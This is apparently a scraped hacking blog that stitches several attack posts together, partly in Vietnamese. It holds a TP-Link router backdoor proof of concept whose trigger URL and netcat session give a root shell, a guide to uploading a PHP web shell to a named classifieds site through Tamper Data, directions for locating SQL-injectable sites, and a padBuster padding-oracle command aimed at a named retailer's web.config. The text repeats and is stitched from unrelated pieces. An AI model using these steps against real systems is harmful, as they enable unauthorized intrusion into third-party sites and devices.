Bầu trời của tôi: hacking

TP-Link http/tftp backdoor

<h2>
<span style="background-color: black; color: white;">
About the TP-Link Router<a href="http://sekurak.pl/wp-content/uploads/2013/03/tp-logo.jpg" rel="prettyPhoto[entry_gallery]"><img alt="tp-logo" class="size-full wp-image-2221 alignright" height="175" src="http://sekurak.pl/wp-content/uploads/2013/03/tp-logo.jpg" width="200" /></a></span></h2>
<span style="background-color: black; color: white;">TP-Link TL-WDR4300 is a popular dual band WiFi, SOHO class router.</span><br />
<h2>
<span style="background-color: black; color: white;">
Tested Firmware</span></h2>
<span style="background-color: black; color: white;">We tested the remote root PoC on the newest firmware (published on 25.12.2012):</span><br />
<div class="wp-caption aligncenter" id="attachment_2174" style="width: 555px;">
<a href="http://sekurak.pl/wp-content/uploads/2013/03/firmware_version.png" rel="prettyPhoto[entry_gallery]"><span style="background-color: black; color: white;"><img alt="firmware" class="size-full wp-image-2174" height="139" src="http://sekurak.pl/wp-content/uploads/2013/03/firmware_version.png" width="545" /></span></a><br />
<div class="wp-caption-text">
<span style="background-color: black; color: white;">TL-WDR4300 – tested firmware version</span></div>
</div>
<span style="background-color: black; color: white;">The following info is provided for educational use only! We are also 
not resposible for any potential damages of the devices which are tested
 for this vulnerability.</span><br />
<div class="boxBlue">
<span style="background-color: black; color: white;">Update: more info about <a href="http://sekurak.pl/more-information-about-tp-link-backdoor/">the issues in the router is available here</a>.</span></div>
<h2 id="poc">
<span style="background-color: black; color: white;">
Proof of Concept</span></h2>
<span style="background-color: black; color: white;"><br /></span>
<div class="boxBlue">
<span style="background-color: black; color: white;">Update2: it works on WAN port if http admin is open on WAN. Also, many (if not all) other TP-Link devices are affected!</span></div>
<span style="background-color: black; color: white;"><br /></span>
<div class="crayon-syntax crayon-theme-arduino-ide crayon-font-courier-new crayon-os-pc print-yes crayon-wrapped" data-settings=" minimize scroll-mouseover wrap" id="crayon-5260fe6c41f0e742116581" style="clear: both; float: none; font-size: 14px ! important; height: auto; line-height: 15px ! important; margin-bottom: 12px; margin-top: 12px; max-width: 610px;">
<div class="crayon-plain-wrap">
<textarea class="crayon-plain print-no" data-settings="dblclick" readonly="readonly" style="-moz-tab-size: 4; font-size: 14px ! important; line-height: 15px ! important; opacity: 0; overflow: hidden; z-index: 0;">root@secu:~#
 ls -l /srv/tftp/nart.out
-rw-r--r-- 1 root root 871604 Mar 11 18:23 /srv/tftp/nart.out
root@secu:~# nc 192.168.0.1 2222
(UNKNOWN) [192.168.0.1] 2222 (?) : Connection refused
root@secu:~# wget 
http://192.168.0.1/userRpmNatDebugRpm26525557/start_art.html            
                                                                        
                                   --2013-03-09 23:22:31--  
http://192.168.0.1/userRpmNatDebugRpm26525557/start_art                 
                                                                        
                            .html
Connecting to 192.168.0.1:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: "start_art.html"

[ <=>                                   ] 426         --.-K/s 
  in 0s

2013-03-09 23:22:33 (49.1 MB/s) - "start_art.html" saved [426]

root@secu:~# nc 192.168.0.1 2222
ps
  PID  Uid     VmSize Stat Command
    1 root        404 S   init
    2 root            SW< [kthreadd]
    3 root            SW< [ksoftirqd/0]
    4 root            SW< [events/0]
    5 root            SW< [khelper]
    6 root            SW< [async/mgr]
    7 root            SW< [kblockd/0]
    8 root            SW  [pdflush]
    9 root            SW  [pdflush]
   10 root            SW< [kswapd0]
   17 root            SW< [mtdblockd]
   18 root            SW< [unlzma/0]
   71 root       2768 S   /usr/bin/httpd
   76 root        380 S   /sbin/getty ttyS0 115200
   78 root        208 S   ipcserver
   82 root       2768 S   /usr/bin/httpd
   83 root       2768 S   /usr/bin/httpd
   86 root        732 S   ushare -d -x -f /tmp/ushare.conf
   92 root        348 S   syslogd -C -l 7
   96 root        292 S   klogd
  101 root            SW< [napt_ct_scan]
  246 root        348 S   /sbin/udhcpc -h TL-WDR4300 -i eth0.2 -p 
/tmp/wr841n/u
  247 root        204 S   /sbin/udhcpc -h TL-WDR4300 -i eth0.2 -p 
/tmp/wr841n/u
  251 root        364 S   /usr/sbin/udhcpd /tmp/wr841n/udhcpd.conf
  286 root       2768 S   /usr/bin/httpd
  299 root       2768 S   /usr/bin/httpd
  300 root       2768 S   /usr/bin/httpd
  305 root       2768 S   /usr/bin/httpd
  307 root       2768 S   /usr/bin/httpd
  309 root       2768 S   /usr/bin/httpd
  310 root       2768 S   /usr/bin/httpd
  389 root       2768 S   /usr/bin/httpd

root@secu:~# ls -l /srv/tftp/nart.out

-rw-r--r-- 1 root root 871604 Mar 11 18:23 /srv/tftp/nart.out

root@secu:~# nc 192.168.0.1 2222

(UNKNOWN) [192.168.0.1] 2222 (?) : Connection refused

root@secu:~# wget http://192.168.0.1/userRpmNatDebugRpm26525557/start_art.html --2013-03-09 23:22:31-- http://192.168.0.1/userRpmNatDebugRpm26525557/start_art .html

Connecting to 192.168.0.1:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: unspecified [text/html]

Saving to: "start_art.html"

[ <=> ] 426 --.-K/s in 0s

2013-03-09 23:22:33 (49.1 MB/s) - "start_art.html" saved [426]

root@secu:~# nc 192.168.0.1 2222

PID Uid VmSize Stat Command

1 root 404 S init

2 root SW< [kthreadd]

3 root SW< [ksoftirqd/0]

4 root SW< [events/0]

5 root SW< [khelper]

6 root SW< [async/mgr]

7 root SW< [kblockd/0]

8 root SW [pdflush]

9 root SW [pdflush]

10 root SW< [kswapd0]

17 root SW< [mtdblockd]

18 root SW< [unlzma/0]

71 root 2768 S /usr/bin/httpd

76 root 380 S /sbin/getty ttyS0 115200

78 root 208 S ipcserver

82 root 2768 S /usr/bin/httpd

83 root 2768 S /usr/bin/httpd

86 root 732 S ushare -d -x -f /tmp/ushare.conf

92 root 348 S syslogd -C -l 7

96 root 292 S klogd

101 root SW< [napt_ct_scan]

246 root 348 S /sbin/udhcpc -h TL-WDR4300 -i eth0.2 -p /tmp/wr841n/u

247 root 204 S /sbin/udhcpc -h TL-WDR4300 -i eth0.2 -p /tmp/wr841n/u

251 root 364 S /usr/sbin/udhcpd /tmp/wr841n/udhcpd.conf

286 root 2768 S /usr/bin/httpd

299 root 2768 S /usr/bin/httpd

300 root 2768 S /usr/bin/httpd

305 root 2768 S /usr/bin/httpd

307 root 2768 S /usr/bin/httpd

309 root 2768 S /usr/bin/httpd

310 root 2768 S /usr/bin/httpd

389 root 2768 S /usr/bin/httpd

Details

After the following HTTP request is sent:

http://192.168.0.1/userRpmNatDebugRpm26525557/start_art.html

the router downloads a file (nart.out) from the host which has issed the http request and executes is as root:

PoC – diagram

Sample captures from the host which issues the http request:

Wireshark filter used to show router tftp traffic

nart.out tftp request

Models affected

TL-WDR4300
TL-WR743ND (v1.2 v2.0)
…

History of the bug

12.02.2013 – TP-Link e-mailed with details – no response
22.02.2013 – TP-Link again e-mailed with details – no response
12.03.2013 – public disclosure
14.03.2013 – UPDATE: contact from TP-Link Poland. They asked for some more detailed information. Additional PoC sent.
15.03.2013 – UDPATE: confirmation of the issue (it is WAN exploitable if http admin is available from WAN side)

TP-Link http/tftp backdoor

About the TP-Link Router TP-Link TL-WDR4300 is a popular dual band WiFi, SOHO class router. Tested Firmware We tested the remote root...

Upload shell with Tamper Data

<html>
<head>
<title>Upload shell with Tamper Data</title>
<meta name="description" content="How to upload your PHP shell through Tamper Data" />
<link rel="canonical" href="http://myskyx.blogspot.com/2013/10/upload-shell-with-tamper-data.html" /><link rel="alternate" media="handheld" href="http://myskyx.blogspot.com/2013/10/upload-shell-with-tamper-data.html" />
<meta name="robots" content="index,follow,noodp" />
</head>
<body>
<h2>How to upload your PHP shell through Tamper Data</h2>
<span style="background-color: black; color: white;"><br /></span>
<span style="background-color: black; color: white;">Many times you get login of a website, but you are unable to upload your PHP shell !<br />
<br />
Today i'll show you how to upload your PHP shell through Tamper Data an 
Firefox Add-on Install Tamper Data firefox add-on: Download Tamper Data 
here Now Install it and Restart Firefox Rename shell: Note: You have to 
rename you .php shell to .jpg to bypass the website's security To upload
 a shell, of-course you needed a upload option in login page or anywhere
 ! Demo: As an example i'll take - <a href="http://freead1.net/post-free-ad-to-USA-42" target="_blank">http://freead1.net/post-free-ad-to-USA-42</a><br />
<br />
 It is a free classified ads posting website, so i got a upload option 
there ! Find your upload option click on browse, locate you .jpg shell 
and select it !<br />
Download Tamper Data here <br />
<br />
<a href="https://addons.mozilla.org/en-US/firefox/addon/tamper-data/" target="_blank">https://addons.mozilla.org/en-US/firefox...mper-data/</a><br />
<br />
Now Install it and Restart Firefox<br />
<br />
It is an ad posting website so it has an upload option. Find your .jpg shell and upload it. Don't hit submit though. <br />
<br />
<a href="http://img607.imageshack.us/img607/5724/43506463.png" rel="lightbox"><img alt="[Hình: 43506463.png]" border="0" src="http://img607.imageshack.us/img607/5724/43506463.png" /></a><br />
<br />
Now click on Tools in Firefox Menu bar and Select Tamper Data, Tamper Data will open in a new window.<br />
<br />
<a href="http://img694.imageshack.us/img694/2722/53666832.png" rel="lightbox"><img alt="[Hình: 53666832.png]" border="0" src="http://img694.imageshack.us/img694/2722/53666832.png" /></a><br />
<br />
Before Clicking on Upload button click on "Start Tamper" in Tamper Data window.<br />
Note: Before Clicking on "Start Tamper" close every extra tab you have opened.<br />
<br />
After clicking on upload button "Tamper with request?" window will appear on tamper data. <br />
<br />
[b]Click on "Tamper" button[b/]<br />
<br />
<a href="http://img819.imageshack.us/img819/3472/57130154.png" rel="lightbox"><img alt="[Hình: 57130154.png]" border="0" src="http://img819.imageshack.us/img819/3472/57130154.png" /></a><br />
<br />
After clicking on "Tamper" you will see "Tamper Popup"<br />
In Tamper Popup Window, Copy "POST_DATA" text in Notepad<br />
<br />
<a href="http://img341.imageshack.us/img341/2743/22787820.jpg" rel="lightbox"><img alt="[Hình: 22787820.jpg]" border="0" src="http://img341.imageshack.us/img341/2743/22787820.jpg" /></a><br />
<br />
After Copying it to Notepad, "Find yourshell.jpg" and rename it to .php.<br />
<br />
<a href="http://img259.imageshack.us/img259/750/36323600.png" rel="lightbox"><img alt="[Hình: 36323600.png]" border="0" src="http://img259.imageshack.us/img259/750/36323600.png" /></a><br />
<br />
Now copy the text from Notepad back to "POST_DATA" field and click OK<br />
It will Upload the shell as .php and you can now execute it <br />
<br />
Find your .php shell and do whatever you want with that website.     </span><br />
<span style="background-color: black; color: white;"><br /></span>
<span style="background-color: black; color: white;">Video demo: </span><br />
<a href="http://www.youtube.com/watch?v=imp1oe54JeQ">http://www.youtube.com/watch?v=imp1oe54JeQ</a>
</body>
</html>

Upload shell with Tamper Data

Upload shell with Tamper Data How to upload your PHP shell through Tamper Data Many times you get login of a website, but you are ...

Hellbound hackers basic 1

Hellbound hackers basic 1 start with this link: https://www.hellboundhackers.org/challenges/basic1/index.php the first Crt+u page, you will ...

Finding websites vulnerable to sql injection without using dorks

1, First open up a proxied browser and visit <a href="http://punkspider.hyperiongray.com/">http://punkspider.hyperiongray.com/</a><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://ultimatepeter.com/wp-content/uploads/2013/06/interface1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="352" src="http://ultimatepeter.com/wp-content/uploads/2013/06/interface1.png" width="640" /></a></div>
2, Enter the keyword in the textbox<br />
    In this case I type '.com'<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://ultimatepeter.com/wp-content/uploads/2013/06/interface2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="190" src="http://ultimatepeter.com/wp-content/uploads/2013/06/interface2.png" width="640" /></a></div>
<br />
3, Now, check the vulnerable type<br />
In this case i checked SQLI<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://ultimatepeter.com/wp-content/uploads/2013/06/interface-3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="206" src="http://ultimatepeter.com/wp-content/uploads/2013/06/interface-3.png" width="640" /></a></div>
<br />
4, Now press the spider button<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://ultimatepeter.com/wp-content/uploads/2013/06/interface-4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="208" src="http://ultimatepeter.com/wp-content/uploads/2013/06/interface-4.png" width="640" /></a></div>
5, Finally the vurnerable websites will appear<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://ultimatepeter.com/wp-content/uploads/2013/06/interface-5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="470" src="http://ultimatepeter.com/wp-content/uploads/2013/06/interface-5.png" width="640" /></a></div>
<br />
It show the vurnerable status type and overall risk like this<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://ultimatepeter.com/wp-content/uploads/2013/06/interface-6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="170" src="http://ultimatepeter.com/wp-content/uploads/2013/06/interface-6.png" width="640" /></a></div>
<br />
6, click (show details)<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://ultimatepeter.com/wp-content/uploads/2013/06/interface-7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="312" src="http://ultimatepeter.com/wp-content/uploads/2013/06/interface-7.png" width="640" /></a></div>
<br />
7, The vurnerable link is apear you may exploit it

Finding websites vulnerable to sql injection without using dorks

1, First open up a proxied browser and visit http://punkspider.hyperiongray.com/ 2, Enter the keyword in the textbox In this case ...

Padding Orale Attack

<div class="MsoNormal" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;">Victim: <a href="http://bigc.vn/" style="color: #444444; text-decoration: none;">http://bigc.vn/</a></span></div>
<div class="MsoNormal" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;"> </span></div>
<div class="MsoNormal" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;">Kiểm tra lỗi Padding Orale</span></div>
<div class="MsoNormal" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;"><br /></span></div>
<div class="separator" style="clear: both; color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYdosB9NOMznnHLC4OVlVAlnmcm2rMUCwUelNeuCTLI4YLLD1R1SEyT4QN0YfqP4SgrJW4Y8S6JtogHA-5TVyhvn5LUNQMQbdHtHk5d0v11Jb0ux1gElNyPYDbBShwu6zurXpLugFHaBi9/s1600/12.png" imageanchor="1" style="background-color: black; color: #444444; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img border="0" height="266" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYdosB9NOMznnHLC4OVlVAlnmcm2rMUCwUelNeuCTLI4YLLD1R1SEyT4QN0YfqP4SgrJW4Y8S6JtogHA-5TVyhvn5LUNQMQbdHtHk5d0v11Jb0ux1gElNyPYDbBShwu6zurXpLugFHaBi9/s640/12.png" style="-webkit-box-shadow: rgba(0, 0, 0, 0.2) 0px 0px 0px; border-bottom-left-radius: 0px; border-bottom-right-radius: 0px; border-top-left-radius: 0px; border-top-right-radius: 0px; border: 1px solid transparent; box-shadow: rgba(0, 0, 0, 0.2) 0px 0px 0px; padding: 8px; position: relative;" width="640" /></a></div>
<div class="MsoNormal" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;"><br /></span></div>
<div class="MsoNormal" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;"><br /></span></div>
<div class="MsoNormal" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
</div>
<div class="MsoNormal" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;">View source:</span></div>
<div class="MsoNormal" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;"><br /></span></div>
<div class="separator" style="clear: both; color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiN7jIvhdNPQYb1fiGeuags0Ra6JmihIjr-PWmdih-sTxtgeVMpJg21tOJngsKl9LF_lRFTC_6CBsmaWEP84dMsfcbF0OMza9adsll1ilKoO-03QgqnoquBTEl15expsI_C0YL9YVRLZT-D/s1600/13.png" imageanchor="1" style="background-color: black; color: #444444; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img border="0" height="192" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiN7jIvhdNPQYb1fiGeuags0Ra6JmihIjr-PWmdih-sTxtgeVMpJg21tOJngsKl9LF_lRFTC_6CBsmaWEP84dMsfcbF0OMza9adsll1ilKoO-03QgqnoquBTEl15expsI_C0YL9YVRLZT-D/s640/13.png" style="-webkit-box-shadow: rgba(0, 0, 0, 0.2) 0px 0px 0px; border-bottom-left-radius: 0px; border-bottom-right-radius: 0px; border-top-left-radius: 0px; border-top-right-radius: 0px; border: 1px solid transparent; box-shadow: rgba(0, 0, 0, 0.2) 0px 0px 0px; padding: 8px; position: relative;" width="640" /></a></div>
<div class="MsoNormal" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;"><br /></span></div>
<div class="MsoNormal" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
</div>
<div class="MsoNormal" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;"><br /></span></div>
<div class="MsoNormal" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;">Chú ý đoạn code sau:</span></div>
<pre style="color: white; font-size: 13px; line-height: 18px;"><span style="background-color: black;"><a href="view-source:http://bigc.vn/WebResource.axd?d=OpduU2rj_NJHaBhjNiUZ7g2&t=634538991637902500" style="color: #444444; text-decoration: none;">/WebResource.axd?d=OpduU2rj_NJHaBhjNiUZ7g2<span class="entity"><span style="color: blue;">&amp;</span></span>t=634538991637902500</a>" </span></pre>
<div class="MsoNormal" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;"><br /></span></div>
<div class="MsoNormal" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;"><br /></span></div>
<div class="MsoNormal" style="color: red; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<b style="background-color: black;">Bước 1: Chuẩn bị Tools</b></div>
<div class="MsoNormal" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;"><br /></span></div>
<div class="MsoNormal" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px; margin-left: 0.5in; text-indent: -0.5in;">
<span style="background-color: black;">Trước tiên cần cài đặt perl:</span></div>
<div class="MsoNormal" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px; margin-left: 0.5in; text-indent: -0.5in;">
<span style="background-color: black;"><a href="http://www.activestate.com/activeperl/downloads" style="color: #444444; text-decoration: none;">http://www.activestate.com/activeperl/downloads</a><span class="MsoHyperlink"></span></span></div>
<div class="MsoNormal" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;"><br /></span></div>
<div class="MsoNormal" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;">Coppy 2 file  padBuster.pl và Web.config_bruter.pl sau vào ổ C:</span></div>
<div class="MsoNormal" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;"><br /></span></div>
<div class="MsoNormal" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;">padBuster.pl:</span></div>
<div class="MsoNormal" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<a href="http://www.mediafire.com/?a0auo2tca0ffdfe" style="background-color: black; color: #444444; text-decoration: none;">http://www.mediafire.com/?a0auo2tca0ffdfe</a></div>
<div class="MsoNormal" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;">Web.config_bruter.pl:</span></div>
<div class="MsoNormal" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<a href="http://www.mediafire.com/?3twc9xwizdcdw8p" style="background-color: black; color: #444444; text-decoration: none;">http://www.mediafire.com/?3twc9xwizdcdw8p</a></div>
<div class="MsoNormal" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;">pass unlock: soleil_vhb</span></div>
<div class="MsoNormal" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;">pass giải nén: ceh.vn</span></div>
<div class="MsoNormal" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;"><br /></span></div>
<div class="MsoNormal" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;"><br /></span></div>
<div class="MsoNormal" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;"><br /><a href="" name="more"></a></span></div>
<div class="MsoNormal" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;"><br /></span></div>
<div class="MsoNormal" style="color: red; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<b style="background-color: black;">Bước 2:  Thực hiện lệnh trên CMD</b></div>
<div class="MsoNormal" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;"><br /></span></div>
<div class="MsoNormal" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;">vào Run command</span></div>
<div class="MsoNormal" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;"><br /></span></div>
<blockquote class="tr_bq" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<div class="MsoNormal">
<span style="background-color: black;">Cd\</span></div>
</blockquote>
<div class="MsoNormal" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;"><br /></span></div>
<div class="MsoNormal" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;">Chạy lệnh:</span></div>
<blockquote class="tr_bq" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<div class="MsoNoSpacing">
<span style="background-color: black;">padBuster.pl http://bigc.vn/WebResource.axd?d=OpduU2rj_NJHaBhjNiUZ7g2 OpduU2rj_NJHaBhjNiUZ7g2 8 -encoding 3 -plaintext "|||~/web.config"</span></div>
</blockquote>
<div class="MsoNoSpacing" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;"><br /></span></div>
<div class="separator" style="clear: both; color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFKKD4_6taTVH6AarO5-j_hd2ELyllR0Jp5FetVLxLzWWoTMGjRbCRXA-YIKiQfKwJJN9F3UntF7SOVtbreGmLtAiyMDQsPdSSv3BKmyYZc43HHPC8fGPFvX3GVFlaZLtFElMuxODBCexr/s1600/14.png" imageanchor="1" style="background-color: black; color: #444444; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img border="0" height="436" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFKKD4_6taTVH6AarO5-j_hd2ELyllR0Jp5FetVLxLzWWoTMGjRbCRXA-YIKiQfKwJJN9F3UntF7SOVtbreGmLtAiyMDQsPdSSv3BKmyYZc43HHPC8fGPFvX3GVFlaZLtFElMuxODBCexr/s640/14.png" style="-webkit-box-shadow: rgba(0, 0, 0, 0.2) 0px 0px 0px; border-bottom-left-radius: 0px; border-bottom-right-radius: 0px; border-top-left-radius: 0px; border-top-right-radius: 0px; border: 1px solid transparent; box-shadow: rgba(0, 0, 0, 0.2) 0px 0px 0px; padding: 8px; position: relative;" width="640" /></a></div>
<div class="MsoNoSpacing" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;"><br /></span></div>
<div class="MsoNoSpacing" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;"><br /></span></div>
<div class="MsoNoSpacing" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
</div>
<div class="MsoNoSpacing" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;"><br /></span></div>
<div class="MsoNoSpacing" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;"><br /></span></div>
<div class="MsoNoSpacing" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;">Đến bước này đợi 1 lát, nó sẽ chạy cho đến dòng:</span></div>
<div class="MsoNoSpacing" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;"><br /></span></div>
<blockquote class="tr_bq" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<div class="MsoNoSpacing">
<span style="background-color: black;">“The ID# marked with **  is recommended: “</span></div>
</blockquote>
<div class="MsoNoSpacing" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;"><br /></span></div>
<div class="MsoNoSpacing" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;">Lúc này ta sẽ nhập số 2 và ấn enter</span></div>
<div class="MsoNoSpacing" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;"><br /></span></div>
<div class="MsoNoSpacing" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;"><br /></span></div>
<div class="MsoNoSpacing" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;"><br /></span></div>
<div class="separator" style="clear: both; color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXuBv5hpRcpnyh4SOtQDFi4go33LJpaiEucC4x0jyYFd56TXpRCc1u1hD9MirADZ1GFza34Q55yPCOdiiWW_TwmeG_E6shkQQvY7fZaNb7IF_sJPPs8tLhrNGQsOb3SOMq6pRBDBkfXnXj/s1600/15.png" imageanchor="1" style="background-color: black; color: #444444; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img border="0" height="440" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXuBv5hpRcpnyh4SOtQDFi4go33LJpaiEucC4x0jyYFd56TXpRCc1u1hD9MirADZ1GFza34Q55yPCOdiiWW_TwmeG_E6shkQQvY7fZaNb7IF_sJPPs8tLhrNGQsOb3SOMq6pRBDBkfXnXj/s640/15.png" style="-webkit-box-shadow: rgba(0, 0, 0, 0.2) 0px 0px 0px; border-bottom-left-radius: 0px; border-bottom-right-radius: 0px; border-top-left-radius: 0px; border-top-right-radius: 0px; border: 1px solid transparent; box-shadow: rgba(0, 0, 0, 0.2) 0px 0px 0px; padding: 8px; position: relative;" width="640" /></a></div>
